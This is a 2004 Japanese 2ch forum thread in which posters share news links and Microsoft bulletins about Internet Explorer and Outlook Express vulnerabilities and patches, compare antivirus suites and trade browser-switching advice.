679名無しさん@お腹いっぱい。:04/04/03 21:43
いちいち右クリしなきゃならんのか…
680名無しさん@お腹いっぱい。:04/04/04 13:16
HTMLメールをテキストで表示するようにしてれば大丈夫なのではないかと…
681名無しさん@お腹いっぱい。:04/04/06 18:18
リンク先のURLを偽装できるセキュリティ・ホールがIEに,OEユーザーは特に注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040405/142470/
682名無しさん@お腹いっぱい。:04/04/06 19:24
Internet Explorer showHelp() Restriction Bypass Vulnerability (secunia.com, 2004-03-29)
http://secunia.com/advisories/10523/
ttp://www.st.ryukoku.ac.jp/~kjm/security/memo/#20040406_showHelp
>>680
それはマンドクセ・・
でも、そうしないとヤバい?
Outlook 2003はOEとちがってプレビューしても安全でしょうか?
686名無しさん@お腹いっぱい。:04/04/07 14:13
>>682
ノートンは"MHTMLRedir.Exploit"として検出するようだ。
>>682
それexploit公開されてる?
XPSP2だと発動しないのか再現に失敗してるだけなのか
確かめたいんだが
688687:04/04/07 21:13
MS03-032が当たってれば問題ないのか
http://www.st.ryukoku.ac.jp/~kjm/security/memo/2004/04.html#20040407_tuiki
689名無しさん@お腹いっぱい。:04/04/08 11:25
>>686
参考
MHTMLRedir.Exploit 発見日: 2003年12月11日 (米国時間)
http://www.symantec.com/region/jp/sarcj/data/m/mhtmlredir.exploit.html
>MHTMLRedir.Exploitは、悪意のあるWebサイトがユーザのコンピュータにプログラムをダウンロードし、
>実行することができるようにします。
690名無しさん@お腹いっぱい。:04/04/09 23:01
Vendor Status Note JVNTA04-099A
Microsoft Internet Explorer に含まれる ITS プロトコルハンドラの脆弱性
http://jvn.doi.ics.keio.ac.jp/vn/JVNTA04-099A.html

W32/Bugbear-E
>ZIP 拡張子のある添付ファイルは、ベース64でエンコーディングされたワーム
>を持つ圧縮 HTMLを含み、HTML ファイルが開けられた時にワームが解読されて
>自動的に実行されるよう、 Microsoft Internet Explorer に関連するコードの
>脆弱性を利用しようとします。
http://www.sophos.co.jp/virusinfo/analyses/w32bugbeare.html
691名無しさん@お腹いっぱい。:04/04/09 23:07
IEのパッチ未公開セキュリティ・ホールをUS-CERTなどが警告,複数の攻撃コードが出回っている
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040409/142701/
692名無しさん@お腹いっぱい。:04/04/10 20:29
IE脆弱性を狙ったウイルスが登場、MSは「対策を進めている」
http://www.itmedia.co.jp/enterprise/0404/10/epn01.html
IEに脆弱性、完全な解決策は存在せず
http://www.itmedia.co.jp/enterprise/0404/10/epc02.html
これはヤバいかも・・・
694名無しさん@お腹いっぱい。:04/04/14 11:06
===緊急===
MS04-013 - Outlook Express 用の累積的な修正プログラム (837009)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-013.asp

Outlook Expressに「緊急」のセキュリティ・ホール,すぐにパッチの適用を
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040414/142886/
695名無しさん@お腹いっぱい。:04/04/14 11:11
>>7

HTMLの表示 > テキストに変換して表示

696名無しさん@お腹いっぱい。:04/04/14 11:19
>>197
セキュリティーをするのに 無料と思ってる前提が糞でつ

697名無しさん@お腹いっぱい。:04/04/14 11:46
2年前の投稿にレスつけられてもな・・・
>>688
問題あった
そこに書かれてるのはMS03-032とMS04-013を組み合わせた
攻撃が存在するということだけで、MS03-032を利用しない
攻撃も可能
699名無しさん@お腹いっぱい。:04/04/14 12:14
パッチをあてる と
アップグレードは意味ちがうのですか?
厳密にはな、まあ前後の文意から読め

つーか何の話だ
>>699
パッチをあてるは文字通りその穴に対する「つぎあて」。グレードはあがらないのが普通。
702名無しさん@お腹いっぱい。:04/04/14 14:02
パッチ未公開のセキュリティ・ホールにも対応,最新版「IEを使い続けるための“お勧め”設定」
今までの“お勧め”設定では不十分,「マイ コンピュータ」ゾーンでもセキュリティ設定を
今週のSecurity Check [Windows編] (第116回,2004年4月14日
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040413/2/
703名無しさん@お腹いっぱい。:04/04/20 14:05
ID詐取「フィッシング」を防止するIE向けツールバー,米EarthLinkが発表
http://itpro.nikkeibp.co.jp/free/ITPro/USNEWS/20040420/143274/
サイトー企画社の鶴亀メール バージョン 3.50 for Windows に
Buffer Overflow の問題を発見しました。悪意のある攻撃者は、
この問題を利用し 鶴亀メールを実行するユーザの権限で任意
のコードを実行できる可能性があります。
http://www.lac.co.jp/security/csl/intelligence/SNSadvisory/71.html
705名無しさん@お腹いっぱい。:04/04/21 10:50
「危険なセキュリティ・ホールが複数,深刻度が『なし』から『緊急』に」
――4月のセキュリティ情報を解説する
“超特大”のセキュリティ・ホールが含まれる,相次ぐセキュリティ情報の変更に注意
今週のSecurity Check [Windows編] (第117回,2004年4月21日)
http://itpro.nikkeibp.co.jp/members/ITPro/SEC_CHECK/20040420/1/
706名無しさん@お腹いっぱい。:04/04/21 22:49
セキュリティ・ホールを突くフィッシングが出現,キー・ロガーを仕掛ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040421/143365/
>今回のフィッシングが突くセキュリティ・ホールは,マイクロソフト
>が4月14日に公開したセキュリティ・ホールの一つ「MS04-013」であ
>る(関連記事)。このセキュリティ・ホールは「Outlook Expressに
>関するセキュリティ・ホール」とされているものの,正確には
>Outlook Expressに実装されている「MHTMLプロトコル・ハンドラ」の
>セキュリティ・ホールである。このため,Outlook Expressに限らず,
>Internet Explorer(IE)などで「mhtml」を含むURLにアクセスする
>場合には,このセキュリティ・ホールの影響を受ける。同社のセキュ
>リティ情報で「Outlook Expressを使っていなくても,Outlook Express
>がインストールされている環境ではパッチを適用する必要がある」と
>しているのはこのためである。つまり,「MS04-013」のパッチを適用
>していない環境において,偽のメール(フィッシング・メール)に記
>載されたリンクにIEでアクセスすると,キー・ロガーを勝手にインス
>トールされることになる。
Norton Internet Security 2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
スクリプト遮断機能がある
広告ブロックがアメリカ仕様で、お絵かき掲示板などの画像も消してしまう
スレに貼り付けてあるだけのウイルスコードに反応する
2chの過去ログ取得する時はFWを無効にしないといけない
Antispamが勝手にメーラーと統合する上に不安定(OEと相性が悪い?)
ポップアップ通知が鬱陶しい
LiveUpdateが遅い
webごとにスプリクト遮断やActiveX遮断やプライバシー制御の設定ができる
WEB閲覧するときHTMLファイルにスクリプトを埋め込む処理が重い
 (XPSP2ではデフォルトでポップアップ広告遮断機能があるので無駄になる)
回線速度が遅くなるという報告
ルールが適切ではないとの声もあるがPFWルールの自動作成が進んでいる
不正コピー・不正期限延長ユーザーが多い
個人情報を送ってるかについては疑惑は晴れず。
http://www.symantec.com/region/jp/products/nis/features.html
http://www.symantec.com/region/jp/products/nav/features.html

ウイルスバスター2004
圧縮ファイルもリアルタイムで監視可能だが、ONにすると重すぎ
FWレベル高にしないとアプリごとの制御ができない等、おまけ程度
スパイウェアの検出をするが削除は出来ない
迷惑メール検出の判定精度が悪い上に検出しても件名に[MEIWAKU]と付けるだけで意味がない
ユーザー登録しないとウィルス定義をUPできないので不正コピーユーザーは少ない
http://www.trendmicro.com/jp/products/desktop/vb/evaluate/features.htm

FWがしょぼい代わりに不具合が少ないバスターとFWにいろいろと機能が付いてる
代わりに不具合大盛りなNISって感じかな。
どちらもアンチウイルス機能自体には文句が出ないのは例年通り。

http://pc3.2ch.net/test/read.cgi/sec/1067918099/321
708名無しさん@お腹いっぱい。:04/05/08 22:22
Eudoraに深刻なセキュリティホール
http://www.itmedia.co.jp/enterprise/0405/08/epc05.html
709名無しさん@お腹いっぱい。:04/05/11 14:10
Outlook ExpressやEudoraなどに
ステータス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040511/143979/
>メール・ソフトOutlook Express/OutlookおよびEudoraに,
>リンクの飛び先を表示するステータス・バーを偽装できる
>セキュリティ・ホールがそれぞれ見つかっている。
711名無しさん@お腹いっぱい。:04/05/12 22:31
IEやOEの脆弱性を悪用し、リンクをクリックするだけで感染するウイルス
〜件名が「Re:」で本文に「yahoo.com」のリンクがある場合は要注意
http://internet.watch.impress.co.jp/cda/news/2004/05/12/3068.html
712名無しさん@お腹いっぱい。:04/05/13 15:56
月例パッチの裏で取り残されたIE/Outlookの問題
http://www.itmedia.co.jp/enterprise/0405/12/epn08.html
マイクロソフトは5月12日、Windowsの月例パッチを公開したが、
一方でいまだ修正にいたらないIEおよびOutlook製品の複数の
セキュリティホールが報告されている。
714名無しさん@お腹いっぱい。:04/05/20 12:57
Outlook 2003に危険度「中」の脆弱性
http://www.itmedia.co.jp/enterprise/0405/19/epc03.html
715名無しさん@お腹いっぱい。:04/05/20 16:38
>>714
716名無しさん@お腹いっぱい。:04/05/21 12:03
>>708
脆弱性に対応した「Eudora 6.1.1」リリース
http://www.itmedia.co.jp/enterprise/0405/20/epc09.html
717名無しさん@お腹いっぱい。:04/06/02 21:40
718名無しさん@お腹いっぱい。:04/06/09 12:21
Internet Explorer Local Resource Access and Cross-Zone Scripting Vulnerabilities
http://secunia.com/advisories/11793/
719名無しさん@お腹いっぱい。:04/06/10 09:42
IEにパッチ未公開のセキュリティ・ホール,悪用するWebサイトが既に存在
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040609/145590/
IE6に任意のコードが実行可能な脆弱性、すでに悪用法が公開されている
〜6月の月例パッチでは、修正プログラムが提供されず
http://internet.watch.impress.co.jp/cda/news/2004/06/09/3420.html
721名無しさん@お腹いっぱい。:04/06/11 15:48
JustSystem Shurikenマンセー
独自ブラウザエンジンマンセー
IE に重大な脆弱性、MS は月例スケジュール外でも対応を検討
http://japan.internet.com/webtech/20040611/12.html
723名無しさん@お腹いっぱい。:04/06/12 23:42
724名無しさん@お腹いっぱい。:04/06/15 12:58
IEやMozillaにアドレス・バーを偽装されるセキュリティ・ホール
IEではセキュリティ設定を回避される恐れあり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040614/145800/
725名無しさん@お腹いっぱい。:04/06/23 00:14
【新型ブラクラ】IE及び2chブラウザも注意!
http://qb5.2ch.net/test/read.cgi/operate/1087907963/l50

またもやOperaにアドレス・バーを偽装されるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040622/146233/
726名無しさん@お腹いっぱい。:04/06/24 10:51
IEの印刷機能にバグ,特定ページを印刷すると大量の印刷物が出力される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040623/146295/
>>726
大量とは500枚以上らしい
IEでページを印刷する際、意図せずに500枚以上印刷してしまう不具合
http://internet.watch.impress.co.jp/cda/news/2004/06/24/3627.html
728名無しさん@お腹いっぱい。:04/06/25 21:08
ウェブサイトにアクセスしただけで感染――IEユーザーに警告
http://www.itmedia.co.jp/enterprise/articles/0406/25/news051.html
一番良いのはIEもOEも使わないことなんだが…。
>>1の「建設的に」ってのは、「それを言うな」って意味なんだろうね?

んじゃ、勝手にすれば?
>>729
2年以上前の>>1に今更レスすることは全く建設的ではありませんね。
ワロタ
732名無しさん@お腹いっぱい。:04/06/30 14:31
IIS/IEを攻撃するDownload.Jectに関与したロシアのWebサイトが閉鎖に
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20040629/4/
IEのライバルにチャンス到来――脚光浴びるブラウザセキュリティ
http://www.itmedia.co.jp/enterprise/articles/0406/29/news030.html
733名無しさん@お腹いっぱい。:04/07/01 13:08
IEにセキュリティ・ホール,フレーム中に任意のコンテンツを表示させられる
有名企業のWebページに偽ページを埋め込むことが可能に
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040630/146625/
734名無しさん@お腹いっぱい。:04/07/01 15:18
>>733
((;゚Д゚)ガクガクブルブル
おかげさまでIE(含OE)は何でもありのブラウザまで進化しました。
この状況を希望しない方はFirefox若しくはOperaをご使用下さい。

( ゚Д゚)<ポカーン
737名無しさん@お腹いっぱい。:04/07/02 12:45
フレーム詐称の問題はIE以外のWebブラウザにも
http://www.itmedia.co.jp/enterprise/articles/0407/02/news015.html
Windows版のIE5.01/5.5/6に、フレームを悪用してWebサイトの偽装が可能な問題
が指摘されたが、Opera、Mozillaなど他のWebブラウザにも同様の問題が存在するこ
とが明らかになった。
これってIE3/4で一度は修正された穴でしょ。
どいつもこいつも三歩歩いたら忘れる学習能力ゼロの鳥頭ですか?
Download.Ject に関する情報
http://www.microsoft.com/japan/security/incident/download_ject.mspx
公開日: 2004年06月25日 | 更新日: 2004年07月03日 2:00
>>739
そこTechNetセキュリティにリンクがない_| ̄|○

これからは↓にしろってことか
http://www.microsoft.com/japan/security/default.mspx

と思ったらTechNetの一番上にはリンクあるのね
741名無しさん@お腹いっぱい。:04/07/06 19:21
IEの“攻撃回避プログラム”は万全ではない,回避できない攻撃手法が公開されている
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040705/146831/
IE の脆弱性、いまだ存在との指摘
http://japan.internet.com/webtech/20040708/12.html
>>741と同じ内容ですね
744名無しさん@お腹いっぱい。:04/07/13 09:59
OutlookとWordの組み合わせにセキュリティ・ホール,メール転送で任意のコードを実行させられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040712/147134/

IEコンポーネントではないが、使用者多そうなので。。。-
745名無しさん@お腹いっぱい。:04/07/13 10:19
もう良いよ。疲れたよ。
非IE系ブラウザに乗り換えます。
IEに巨大なテキストファイルを表示するとクラッシュする脆弱性
http://internet.watch.impress.co.jp/cda/news/2004/07/13/3880.html
747名無しさん@お腹いっぱい。:04/07/14 09:09
Outlook Express 用の累積的なセキュリティ更新プログラム (823353) (MS04-018)
http://www.microsoft.com/japan/technet/security/bulletin/ms04-018.asp

Outlook Explorer 6って…
748名無しさん@お腹いっぱい。:04/07/14 11:59
「ポップアップ・ウインドウで画面表示を偽装できる」
――IEでファイルをダウンロードするときには注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040713/147187/
749名無しさん@お腹いっぱい。:04/07/14 22:56
IEにパッチ未公開のセキュリティ・ホールが続出
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040714/147214/
》749
自動的にMozilla♪
》????????????
752名無しさん@お腹いっぱい。:04/07/29 09:40
OperaやMozillaのセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20040728/147862/
セキュリティ・ホール

人間が作っているんだもんそんなの当たり前。
きっと完璧なコンピューターでロジックのあら捜ししたら、今見つかっている
5倍は見つかると思うよ。
754名無しさん@お腹いっぱい。:04/07/31 09:38
===緊急===
MS04-025 - Internet Explorer 用の累積的なセキュリティ更新プログラム (867801)
http://go.microsoft.com/?linkid=771783
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。
「IEのセキュリティ・ホールは危険,公開されていない攻撃手法が存在する」――ラック
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040802/148057/
>>753
完璧なコンピューターって、なんじゃ?
757名無しさん@お腹いっぱい。:04/08/17 17:39
またもやIEにアドレス・バーを偽装できるセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040817/148670/
758名無しさん@お腹いっぱい。:04/08/18 11:55
もう何度目? IEのアドレスバー偽装問題、再び
http://www.itmedia.co.jp/enterprise/articles/0408/17/news061.html
Operaだって1ヶ月に4回アドレスバー偽装が発見されたりしたじゃん
テスト結果
Internet Explorer v6.00 SP1 (6.00.2800.1106)では再現されました
Mozilla/5.0 Gecko/20040803 Firefox/0.9.3では再現されず
761名無しさん@お腹いっぱい。:04/08/20 13:03
IEにセキュリティ・ホール,危険なファイルをダウンロードさせられる
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040819/148790/
762名無しさん@お腹いっぱい。:04/08/24 15:08
リンク先を偽装する“偽シティバンク”からのメールに注意
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040823/148888/
763名無しさん@お腹いっぱい。:04/08/26 12:54
Outlook Expressに「BCC」のアドレスを表示してしまう不具合
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040825/149044/
IEのドラッグ&ドロップの脆弱性突いた攻撃が公に?
http://www.itmedia.co.jp/enterprise/articles/0408/26/news075.html?ec20
765名無しさん@お腹いっぱい。:04/09/02 23:44
緊急報告!Windows XP SP2の全貌(第3回)
Internet Explorer/Outlook Express編
http://itpro.nikkeibp.co.jp/members/NT/WinSpecial/20040901/1/
>IEではActiveXコントロールのインストールやスクリプトによるファイルの
>自動ダウンロードなど,5つの事項について警告メッセージを表示するよう
>になっている。OEではHTMLメールの中の外部と張られたリンクなどは,むや
>みに読み込まないようになった。
766名無しさん@お腹いっぱい。:04/09/05 00:08
IEのドラッグ&ドロップの脆弱性を突くトロイの木馬「Akak」出現
http://www.itmedia.co.jp/enterprise/articles/0409/04/news002.html
767MS04-028:04/09/15 09:10:36
===緊急===
MS04-028 - JPEG 処理 (GDI+) のバッファ オーバーランにより、コードが実行される (833987)
http://go.microsoft.com/?linkid=996596
概要 JPEG イメージ形式の処理に脆弱性が存在します。
影響 リモートでコードが実行される
影響を受けるソフトウェア・Windows、Office、Developer、Internet Explorer、他のソフトウェア
詳細な情報は、「影響を受けるソフトウェアおよびダウンロード先」をご確認ください。
XPのSP1だけど、Windows Updateサイトで確認してもMS04-028は出ません。
.NET Framework 1.1 Service Pack 1入れてあるからMS04-028は入れなくて
もいいんだろうか?
とりあえずしばらくは関連情報に注目しときます。
769名無しさん@お腹いっぱい。:04/09/15 11:55:38
WindowsやIE,Officeなど複数のマイクロソフト製品に「緊急」のセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149928/
Microsoft Officeにセキュリティ・ホール,WordPerfect文書でバッファ・オーバーフローの危険性
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040915/149927/
770名無しさん@お腹いっぱい。:04/09/22 10:36:53
IEやMozillaなどにセキュリティ・ホール,なりすましを許す可能性あり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040921/150222/
771名無しさん@お腹いっぱい。:04/09/25 22:57:30
WindowsやIEなどのセキュリティホールを突くさらに危険なJPEGファイルが公開
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040924/150333/
772名無しさん@お腹いっぱい。:04/09/29 14:16:26
セキュリティ・ホールを突くJPEGファイルの“作成ツール”が出回る
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20040928/150524/
773名無しさん@お腹いっぱい。:04/09/30 09:37:07
危険な“JPEGウイルス”出現間近,備えは万全ですか?
http://itpro.nikkeibp.co.jp/free/ITPro/OPINION/20040929/150576/
JPEG処理の脆弱性悪用画像、今度はAIMのプロフィールに
http://www.itmedia.co.jp/enterprise/articles/0409/30/news007.html
WindowsのJPEG処理脆弱性が、さらなる広がりを見せている。
AIMのプロフィールに問題の画像を添付するという手口が登場した模様だ。
774名無し:04/09/30 10:43:05
初心者で申し訳ないのですが、質問させてください。
OEを使っているのですが、気付いたらアカウントの設定
(”サーバー”タブ内のSMTP欄)がいつのまにかlocal hostに変わっていました。
前はISPのSMTPサーバー名を入れてあったのに・・・。

これってどうしてでしょうか?
アンチウィルスソフトがメーラーを監視するためにlocalhostにして
中継している場合もあるよ。
>>775
有難うございます。
安心しました。
777名無しさん@お腹いっぱい。:04/09/30 14:30:34
777get!!
778名無しさん@お腹いっぱい。:04/10/05 09:09:23
IEでパスワードを含めたURLを使うと,ベーシック認証に失敗にする場合あり
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041004/150753/
広がるJPEG GDI+攻撃についての続報
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041004/3/
780名無しさん@お腹いっぱい。:04/10/13 08:54:26
===緊急===
MS04-038 - Internet Explorer 用の累積的なセキュリティ更新プログラム
(834707)
http://go.microsoft.com/?linkid=1187917
781名無しさん@お腹いっぱい。:04/10/14 18:55:38
MS04-038 を適用して何か不具合出た方いらっしゃいます?
調べた限りでは

http://support.microsoft.com/default.aspx?scid=kb;ja;888051

以外に特に問題はなさそうなのですが…
MS04-038は、なさそうだね。
783名無しさん@お腹いっぱい。:04/10/22 13:19:04
IEに2種類のセキュリティ・ホール,組み合わせるとXP SP2も影響を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041021/151548/
784名無しさん@お腹いっぱい。:04/10/27 23:59:12
10月のセキュリティ・ホール,その後
http://itpro.nikkeibp.co.jp/free/ITPro/Security/20041027/151822/
785名無しさん@お腹いっぱい。:04/10/29 14:38:15
開発者のプライドか、それとも「脆弱性」のネガティブイメージの影響か
ttp://d.hatena.ne.jp/HiromitsuTakagi/20041030#p1
787名無しさん@お腹いっぱい。:04/11/02 13:30:08
IEのステータス・バーを偽装する手法が複数公開される
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041101/152016/
>米国時間10月28日以降,セキュリティ関連のメーリング・リストなどで,
>Internet Explorer(IE)のステータス・バーを偽装する手法(セキュ
>リティ・ホール)が複数公開されて議論を呼んだ。アクティブスクリプ
>トを無効にしていても偽装可能なので,IEを「制限付きサイト」ゾーン
>で利用するOutlook ExpressやOutlookといったメール・ソフトも影響
>を受ける。
788名無しさん@お腹いっぱい。:04/11/02 13:46:46
次から次へと穴が見つかるのは何故?
1.シェアが高くて注目されてるから
2.もともと設計が糞だから
3.…

他のOS用のIE6SP2もリリースすべきヽ(`Д´)ノ
>>787
このページの解説がいつも糞なのは、セキュリティソフトのシールドを有効にしていれば、
おそらく実行されるスクリプトコードに既に対応していて、ウィルスと判定してくれて実行などされないので、
全く実害が無いという事である。
790名無しさん@お腹いっぱい。:04/11/02 23:23:33
みんながセキュリティソフト入れてれば、ね。
>>786
利用規約違反中ってなってる・・・
792名無しさん@お腹いっぱい。:04/11/04 11:42:59
>>791
なんでも年齢と郵便番号を偽って登録してたそうな。
早く反省し終わって復帰キボンヌ
偽ってというか、
あんなサービスに正しい個人情報差し出す奴いるのか?

しかしいきなり消すかねえ。

有名サイトなので目をつけられたのか、あからさまに偽と確定できる
住所(「〒123-45 東京都東京市東京町1-1-1」みたいな実在しない
やつ)で登録してたからか。
はてな登録情報の住所追加、正しい情報登録のお願いについて
http://www.hatena.ne.jp/info/address
> 住所をご登録頂いていないユーザー様には、登録情報変更ページに
> て住所をご登録いただくまで、はてなをご利用頂けなくなります

ああ、登録してなかったんだな。たぶん。

そうまでして個人情報吸い上げようとするか。
何か新しい商売はじめるのかね。
>>795
それは来年1月からだろう。
いま見られなくなってるのはTakagiタンが自粛してプライベートモードにしてるだけだと思われ。

あのやり方だと氏名・住所の正確性は担保されないから、
>他者の権利侵害などが行われている場合などに、仮名でユーザー登録を頂いている等の理由で書き込みを行った方の特定ができない
という理由は薄弱だよなぁ。
797名無しさん@お腹いっぱい。:04/11/05 10:39:33
IEに新たなセキュリティ・ホール,WebページやHTMLメールを開くだけで被害を受ける
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041104/152149/
>デンマークSecuniaなどは11月2日,Internet Explorer(IE)6/6 SP1に
>見つかったセキュリティ・ホールを公表した。細工が施されたHTMLファイル
>(WebページやHTMLメール)を開くだけで,任意のプログラムを実行させ
>られる危険性がある。実際,セキュリティ・ホールを突くHTMLファイルが
>公開されている。IE 6に限らず,IEのコンポーネントを利用するメール・
>ソフトなども影響を受けるので要注意。なお,Windows XP SP2を適用して
>いる場合には影響を受けない。(ry
798名無しさん@お腹いっぱい。:04/11/05 11:06:17
ホント他のOS用にもIE6SP2出してほしいよ
仕方がないから会社のWin2kでのWebブラウズは
当面Firefox使うことにした
799名無しさん@お腹いっぱい。:04/11/05 13:39:52
IE6SP2(2K,ME,98用)激しくキボンヌ
NT用モナー
801名無しさん@お腹いっぱい。:04/11/05 16:02:02
サード・パーティ製品で強化する「ブラウザ・セキュリティ」
http://itpro.nikkeibp.co.jp/members/NT/WinSecurity/20041025/1/
>MicrosoftはIEの新版を,単独のソフトウエアとして提供しないと決めた。
>その理由は,同社がIEをOSの不可分な要素と考えているからである。最新
>のWindows XP Service Pack 2(SP2)では,OSの基礎となるセキュリティ
>やIEなど,様々な構成要素に改良を加えた。Microsoftは,Windows 2000
>とそれ以前のOSに対して,同様の改良品を提供する計画はない。
>801
日経はトラッキングクッキー拒否にしているから見られないや まあいいか
>>802
/members/のページは、メンバー登録(無料)とcookieの両方必要。
Internet Explorer のセキュリティ上の問題 "クリックとスクロール" からコンピュータを保護する方法
http://support.microsoft.com/default.aspx?scid=kb;ja;888534
805名無しさん@お腹いっぱい。:04/11/10 09:11:23
IEのパッチ未公開セキュリティ・ホールを突くウイルスが出現
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041109/152325/
806わたしだけ?(だなw):04/11/10 15:53:45
http://www.microsoft.com/japan/technet/security/bulletin/MS04-038.asp
>影響を受けるコンポーネント :
(ry
>Windows XP Service Pack 2 上の Internet Explorer 6
はWinXP-SP2上のIE=IE6-SP2ってことなんだよな
今まで何でわからなかったんだよw>漏れ & 注意つけとけよw>MS
最初読んだ時無印IE6のことだと思っちまったじゃねーかw

漏れはOS違うから↑は関係ないんだけど、やっぱり確認用にWiindowsUpdate(or MBSA)する習慣はつけとかないとダメか・・・

ところでセキュリティサイト・ホームからリンクたどっていっても↓にたどりつけないのも漏れだけ?
http://www.microsoft.com/japan/technet/security/fixedhome.asp?TFrame=false
807名無しさん@お腹いっぱい。:04/11/10 16:14:45
IEのIFrame欠陥を悪用する2番目のMyDoomが出現
http://www.itmedia.co.jp/enterprise/articles/0411/10/news038.html

>>806
リンクからはみつからないね。
「製品別更新プログラム一覧」でサイト内検索すると見つかるけど。
“巧妙な”フィッシングが出現,ポップアップでアドレス・バーを偽装
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041110/152412/
809名無しさん@お腹いっぱい。:04/11/17 17:28:20
IE次期版はLonghornと一緒に出荷,タブ付きブラウジング機能を搭載
http://itpro.nikkeibp.co.jp/free/NT/NEWS/20041117/3/
Microsoft Internet Explorer Two Vulnerabilities
http://secunia.com/advisories/13203/
SP2適用のIE6に画像ダウンロード詐称の脆弱性
http://www.itmedia.co.jp/enterprise/articles/0411/27/news004.html
812名無しさん@お腹いっぱい。:04/11/27 19:47:56
>>811と同一
IEの「名前を付けて画像を保存」機能にセキュリティ・ホール
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041126/153135/
813名無しさん@お腹いっぱい。:04/11/28 20:49:17
マイクロソフト、IE6の「Mshtml.dll」エラーに対する修正プログラムを配布
http://internet.watch.impress.co.jp/cda/news/2004/11/26/5550.html
814MS04-040緊急:04/12/02 07:04:56
===緊急===
MS04-040 - Internet Explorer 用の累積的なセキュリティ更新プログラム (889293)
http://go.microsoft.com/?linkid=1576712
概要
リモートでコードが実行される可能性のある Internet Explorer の脆弱性を
修正するセキュリティ更新プログラムが公開されました。
816名無しさん@お腹いっぱい。:04/12/02 13:36:40
>>814-815
>重要 : この累積的な更新プログラムは、マイクロソフト セキュリティ情報
>MS04-004http://www.microsoft.com/japan/technet/security/bulletin/ms04-004.asp
>または MS04-038http://www.microsoft.com/japan/technet/security/bulletin/ms04-038.asp
>のリリース以来、リリースされた修正プログラムを含まない場合もあります。
>MS04-004 または MS04-038 のリリース以来、マイクロソフトからまたはサポート プロバイダ
>から修正プログラムを受けたお客様は、この更新プログラムをインストールしないで下さい。
>この累積的な更新プログラムではなく、更新プログラム 889669
>http://www.microsoft.com/isapi/gosupport.asp?TARGET=/default.aspx?scid=kb;ja;889669
>を適用して下さい。
MS04-004 または MS04-038 のリリース以来修正プログラムを受けてなくても、
更新プログラム 889669を適用すれば( ゚Д゚)ウマーなのかな?
>>816
889669はMS04-040を含むロールアップだからいいんじゃない?
http://www.microsoft.com/downloads/details.aspx?displaylang=ja&FamilyID=c74028e2-10c9-4edd-ad0a-36493677bff8


http://www.microsoft.com/japan/technet/security/bulletin/fq04-040.asp
>MS04-004 以降にリリースされた Internet Explorer 用の修正プログラムは、その修正プログラムにより置き換えられるファイルが
>このセキュリティ情報の「セキュリティ更新プログラムに関する情報」の欄に記載されている場合、削除されます。
(「累積的なセキュリティ更新プログラム」なんだから↑の「修正プログラム」はセキュリティ修正以外ということでいいんだよね?>ALL)


しかし889293はかなり前のDLLソースにパッチ当てたおかん
818817:04/12/02 18:43:57
ていうか889669じゃないとセキュリティ修正以外のパッチでもトラブル覚悟ですぐ当てるタイプの人には不足(889293でも穴はふさがるけど)
>更新プログラム 889669 には、セキュリティ更新プログラム 889293 (MS04-040) の提供後に作成された Internet Explorer 用修正プログラムのすべてが含まれています。
819816:04/12/02 19:07:20
>>817-818
ありがとうございます。
889669逝ってみます。
IEのパッチが“緊急公開”,既に悪用されている危険なセキュリティ・ホールをふさぐ
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20041202/153376/
821名無しさん@お腹いっぱい。:04/12/07 21:57:48
>>816-818
IE のセキュリティ アップデート MS04-040 (KB889293) を適用する際の注意
http://www.updatecorp.co.jp/products/support/updateexpert/uekb/uekb00000291.html
もう訳わからん。
常にこのページのパッチさえ当てとけばおっけ
みたいな分かりやすい形にしてくれ。
ごちゃごちゃ読んでられん。


で、質問なんだけど、
OEってHTML形式で送られてきてもテキスト形式で表示させてる限り無問題?

俺はメールの送信者をアルファベットで表記してるんだけど、
送信者に表示されるのが日本語の名前じゃないと
怖くて開かずに削除してしまう癖があるとおっしゃる方がおられます。
海外からウィルスよく来るので。
常にテキスト形式で表示させておけばいいんじゃないかと思うのだけど。

from
SUZUKI kenji <[email protected]>

鈴木賢治 <[email protected]>
にして欲しいらしい。

ヘッダに日本語混ぜたくない。
subjectは妥協してるけど。
いや昔のサーバーとかMUAの問題からじゃなくて単に好みでそうしてるんだけど。
無問題なんて言い切れるのは神様かただの莫迦だよ
だってMSだもの

